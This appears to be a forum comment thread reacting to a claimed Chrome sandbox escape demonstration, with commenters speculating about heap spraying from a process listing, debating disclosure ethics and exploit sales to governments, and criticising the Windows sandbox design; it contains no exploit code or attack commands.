it looks to me like they've done some heap spraying in chrome.exe (see the unusual 450MB working set).

the list of 'gray' processes in the 2nd procexp session are:
1) explorer.exe
2) process_explorer.exe
3) process_explorer64.exe
4) chrome.exe (UI)
5) chrome.exe (low-trust child)
6) (new, unknown.exe)
7) heap-sprayed, medium chrome.exe
8) calc.exe

as for #6, above, you can see the bottom 2 rows of pixels of the icon, and it doesn't look like chrome's icon, maybe rundll32.exe ?

Responsibility

[fred133]

Since they aren’t informing the Vendor so it can get patched,
Are they going to take responsibility when it does get into the wild?
Oh, we‘re big security company, we’re secure!
  Yeah right!
Show me a boat that doesn’t leak!

Re:Responsibility

[dhavleak]

Or they could do what Google's security researchers do when they find an issue in an MS product -- release the details to the world within 48 hours (those 48 hours being Saturday and Sunday).

Re:Responsibility

[Rennt]

Pretty sure Google gives MS the details of the exploit before starting the clock.

The govt is gonna be pissed when they read it...

Since the company mission is to provide exploits to government customers for offensive use... they just gave this one away. If you don't think a team of very smart people at google are looking into how this could be done right now... I would guess a fix is out within the next few versions

Re:And..

[WorBlux]

But.. "At its core, the sandbox relies on the protection provided by four Windows mechanisms: A restricted token The Windows job object The Windows desktop object Windows Vista only: The integrity levels" Because the exploit hasn't been release it's unclear weather the bug was in those systems, or the broker code of Chromium, or possibly even a one or more in both.

Cheap - flawed - marketing

[cheros]

That video shows exactly nothing - any 2 screen system can do Windows-R + "calc" offscreen and lob it into the picture, whilst it's looking at a web page. You can also not see if it really is a sub-process, that part is obscured. As far as I can judge by the indentation it is NOT a sub process - thus no hack. But I'm no expert - unlike them I won't pretend to be one either. In summary, this *seriously* lacks credibility.

It's IMHO a rather stupid attempt at getting their name out the and lick up to French Government. As Government I would not use them now because they have gone public with something that could have been useful (if it exists), and as a company I would avoid them like the plague because I would not know who they would sell my vulnerabilities to (instead of me).

Oh, and as for Google? You know, wouldn't it be funny if their website never showed up in any Google search... After all, can't let them do any evil now, can we?

Re:And..

[master_p]

And after reading the above, I conclude that the Windows security model is ...sh1t.

First of all, it's extremely complex. It takes a long web page just to describe some aspects of it.

Secondly, it's extremely disjoint: each little piece of Windows, having been developed in isolation, was its own ways, which results in not being able to enforce a single security system all over the system.

Re:happened to me last night :(

[intheshelter]

WHAT! Haven't you heard that Apple is Evil and Steve Jobs wants to track and eat your shiny baby and market it to look cool to the other fanbois? What that means is that this is not really a problem with Chrome because it's OPEN and it's really the problem of your iPhone because it's tracking the cell towers you go near and you should instead buy Android so Google can keep you safe by tracking EVERYTHING!!

AHHHHHHHHHH, THE SKY IS FALLING!

Sandbox not in os

[currently_awake]

To be done right a sandbox must either be implimented with hardware (max priveledge required) or be an interpreter that mimics (virtual) that setup. The best place for a sandbox is in the OS itself- something windows doesn't do. Without that you are a single buffer overflow or improperly passed pointer away from a compromised system.

derp derp derp

so gay....

this comapny gets to help infringe upon peoples right to illegal search and seizure and warrantless wiretapping, but they freely do business with Govt/LEO.

i cant wait until they get the bright idea to start doxing anon